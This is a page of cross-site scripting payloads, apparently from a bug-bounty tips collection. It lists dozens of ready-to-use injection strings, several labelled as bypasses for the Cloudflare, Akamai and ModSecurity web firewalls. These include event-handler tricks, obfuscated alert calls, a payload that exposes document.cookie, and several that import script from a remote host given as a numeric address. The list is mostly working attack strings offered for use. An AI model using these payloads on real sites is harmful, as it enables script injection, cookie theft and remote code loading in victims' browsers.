Cross Site Scripting (XSS)
Payloads
1
<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
2
<svg onload="alert(1)" <="" svg=""
3
GUYS bypassed cloud flare using this payload
4
"><x/Onpointerrawupdate=confirm(document.cookie)>kira_deathnote
5
‟><marquee/onstart=confirm(1)>
6
"onfocus="alert`1`"autofocus="
7
Useful #XSS Payloads -
8
"><block%quote oncontextmenu%3Dconfirm(1)>Right click me</blockquote><!--
9
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
10
XSS
11
<body ontouchstart=alert(1)>
12
Triggers when a finger touch the screen
13
<body ontouchend=alert(1)>
14
Triggers when a finger is removed from touch screen
15
<body ontouchmove=alert(1)>
16
When a finger is dragged across the screen.
17
Cross Site Scripting (XSS) - Book of BugBounty Tips onerror=alert(1);//
18
" onfocus="alert(1)" autofocus="
19
20
<math><x xlink:href=javascript:confirm`1`>click
21
22
HTML INJECTION + XSS INJECTION
23
24
/<div+id=JavaScript>/<h1>_Y000!_
25
26
/<div+id=JavaScript>/<marquee>_Y000!_</marquee>
27
28
/<div+id=JavaScript>/<marquee onstart=alert`_Y000!_`>_Y000!_</marquee>
29
30
𝘾𝙡𝙤𝙪𝙙𝙛𝙡𝙖𝙧𝙚 𝙒𝘼𝙁 𝘽𝙮𝙥𝙖𝙨𝙨
31
<img src=x onError=import('//1152848220/')>
32
𝘼𝙠𝙖𝙢𝙖𝙞 𝙒𝘼𝙁 𝘽𝙮𝙥𝙖𝙨𝙨
33
<x onauxclick=import('//1152848220/')>click
34
𝙈𝙤𝙙_𝙎𝙚𝙘𝙪𝙧𝙞𝙩𝙮 𝙒𝘼𝙁 𝘽𝙮𝙥𝙖𝙨𝙨
35
<x onauxclick=import('//1152848220/')>click
36
#BugBounty #bugbountytip
37
38
Some payloads that worked for me in popping up a stored XSS:-
39
40
1. <img src=`xx:xx`onerror=alert(1)>
41
2. <div/onmouseover='alert(1)'> style="x:">
42
3. \";alert('XSS');//
43
4. "autofocus/onfocus=alert(1)//
44
5. '-alert(1)-'
45
46
Good luck!
47
48
xss payload + &NewLine;
49
50
<img src=`%00`&NewLine; onerror=alert`_Y000!_`&NewLine;
51
52
<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert`_Y000!_`&NewLine;>_Y000!_</a>
53
54
<img src="X" onerror=top[8680439..toString(30)](1337)>
55
56
<input onfocus="alert('xss');" autofocus>
57
58
#BugBountyTip - Useful #XSS Payloads. Today I used this:
59
< a href="mailto:a"+/onmouseover=prompt(document.domain)>
Copied!
Last modified 6mo ago
Copy link